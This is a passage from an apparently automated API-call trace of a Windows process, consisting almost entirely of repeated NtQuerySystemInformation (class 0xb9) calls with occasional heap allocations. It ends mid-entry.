(SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb10, Length=0x38, ResultLength=0x0) [0214.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd990, Length=0x20, ResultLength=0x0) [0214.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd910, Length=0x20, ResultLength=0x0) [0214.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd910, Length=0x20, ResultLength=0x0) [0214.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd910, Length=0x20, ResultLength=0x0) [0214.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb10, Length=0x38, ResultLength=0x0) [0214.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd990, Length=0x20, ResultLength=0x0) [0214.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd920, Length=0x20, ResultLength=0x0) [0214.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd920, Length=0x20, ResultLength=0x0) [0214.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.124] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdfa0, Length=0x50, ResultLength=0x0) [0214.124] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.124] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdfa0, Length=0x50, ResultLength=0x0) [0214.124] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.125] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdfa0, Length=0x50, ResultLength=0x0) [0214.125] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde90, Length=0x50, ResultLength=0x0) [0214.125] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.125] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde90, Length=0x50, ResultLength=0x0) [0214.125] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.125] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde90, Length=0x50, ResultLength=0x0) [0214.125] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.125] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde90, Length=0x50, ResultLength=0x0) [0214.125] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.125] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddc0, Length=0x38, ResultLength=0x0) [0214.127] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.127] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbf0, Length=0x28, ResultLength=0x0) [0214.127] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.127] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.127] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbf0, Length=0x28, ResultLength=0x0) [0214.127] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.127] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.128] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbf0, Length=0x28, ResultLength=0x0) [0214.128] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.128] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.128] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbf0, Length=0x28, ResultLength=0x0) [0214.128] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.128] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.128] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc60, Length=0x28, ResultLength=0x0) [0214.128] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.128] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.128] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddc0, Length=0x38, ResultLength=0x0) [0214.128] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.128] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdce0, Length=0x28, ResultLength=0x0) [0214.130] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdce0, Length=0x28, ResultLength=0x0) [0214.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb80, Length=0x20, ResultLength=0x0) [0214.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb00, Length=0x20, ResultLength=0x0) [0214.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb00, Length=0x20, ResultLength=0x0) [0214.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb00, Length=0x20, ResultLength=0x0) [0214.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddc0, Length=0x38, ResultLength=0x0) [0214.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddc0, Length=0x38, ResultLength=0x0) [0214.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc40, Length=0x20, ResultLength=0x0) [0214.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbd0, Length=0x20, ResultLength=0x0) [0214.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbd0, Length=0x20, ResultLength=0x0) [0214.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.147] GetProcessHeap () returned 0x27fc8db0000 [0214.148] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0xe0) returned 0x27fc8dbe060 [0214.148] GetProcessHeap () returned 0x27fc8db0000 [0214.148] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x18) returned 0x27fc9e40b90 [0214.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.149] GetProcessHeap () returned 0x27fc8db0000 [0214.149] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x230) returned 0x27fc9db02f0 [0214.149] GetProcessHeap () returned 0x27fc8db0000 [0214.149] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x28) returned 0x27fc9f5f860 [0214.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.149] GetProcessHeap () returned 0x27fc8db0000 [0214.149] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0xe0) returned 0x27fc8dbd340 [0214.149] GetProcessHeap () returned 0x27fc8db0000 [0214.149] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x18) returned 0x27fc9e40d10 [0214.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd00, Length=0x50, ResultLength=0x0) [0214.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.152] GetProcessHeap () returned 0x27fc8db0000 [0214.153] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0xe0) returned 0x27fc8dbe060 [0214.153] GetProcessHeap () returned 0x27fc8db0000 [0214.153] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x18) returned 0x27fc9e40c90 [0214.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.153] GetProcessHeap () returned 0x27fc8db0000 [0214.153] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x230) returned 0x27fc9daf570 [0214.153] GetProcessHeap () returned 0x27fc8db0000 [0214.153] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x28) returned 0x27fc9f5f3e0 [0214.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.154] GetProcessHeap () returned 0x27fc8db0000 [0214.154] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0xe0) returned 0x27fc8dbccb0 [0214.154] GetProcessHeap () returned 0x27fc8db0000 [0214.154] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x18) returned 0x27fc9e411f0 [0214.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd00, Length=0x50, ResultLength=0x0) [0214.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.158] GetProcessHeap () returned 0x27fc8db0000 [0214.158] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0xe0) returned 0x27fc8dbde80 [0214.158] GetProcessHeap () returned 0x27fc8db0000 [0214.158] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x18) returned 0x27fc9e41270 [0214.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.159] GetProcessHeap () returned 0x27fc8db0000 [0214.159] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x230) returned 0x27fc9daf9f0 [0214.159] GetProcessHeap () returned 0x27fc8db0000 [0214.159] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x28) returned 0x27fc9f5f1d0 [0214.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.160] GetProcessHeap () returned 0x27fc8db0000 [0214.160] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0xe0) returned 0x27fc8dbe060 [0214.160] GetProcessHeap () returned 0x27fc8db0000 [0214.160] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x18) returned 0x27fc9e41930 [0214.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd70, Length=0x50, ResultLength=0x0) [0214.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd750, Length=0x50, ResultLength=0x0) [0214.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd750, Length=0x50, ResultLength=0x0) [0214.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd750, Length=0x50, ResultLength=0x0) [0214.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd640, Length=0x50, ResultLength=0x0) [0214.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd640, Length=0x50, ResultLength=0x0) [0214.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd640, Length=0x50, ResultLength=0x0) [0214.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd640, Length=0x50, ResultLength=0x0) [0214.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd570, Length=0x38, ResultLength=0x0) [0214.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd3a0, Length=0x28, ResultLength=0x0) [0214.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd3a0, Length=0x28, ResultLength=0x0) [0214.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd3a0, Length=0x28, ResultLength=0x0) [0214.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd3a0, Length=0x28, ResultLength=0x0) [0214.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd410, Length=0x28, ResultLength=0x0) [0214.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd570, Length=0x38, ResultLength=0x0) [0214.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd490, Length=0x28, ResultLength=0x0) [0214.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd490, Length=0x28, ResultLength=0x0) [0214.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd330, Length=0x20, ResultLength=0x0) [0214.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd2b0, Length=0x20, ResultLength=0x0) [0214.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd2b0, Length=0x20, ResultLength=0x0) [0214.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd2b0, Length=0x20, ResultLength=0x0) [0214.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd570, Length=0x38, ResultLength=0x0) [0214.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd570, Length=0x38, ResultLength=0x0) [0214.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd3f0, Length=0x20, ResultLength=0x0) [0214.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd380, Length=0x20, ResultLength=0x0) [0214.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd380, Length=0x20, ResultLength=0x0) [0214.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9a0, Length=0x50, ResultLength=0x0) [0214.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9a0, Length=0x50, ResultLength=0x0) [0214.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9a0, Length=0x50, ResultLength=0x0) [0214.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd890, Length=0x50, ResultLength=0x0) [0214.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd890, Length=0x50, ResultLength=0x0) [0214.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd890, Length=0x50, ResultLength=0x0) [0214.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd890, Length=0x50, ResultLength=0x0) [0214.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7c0, Length=0x38, 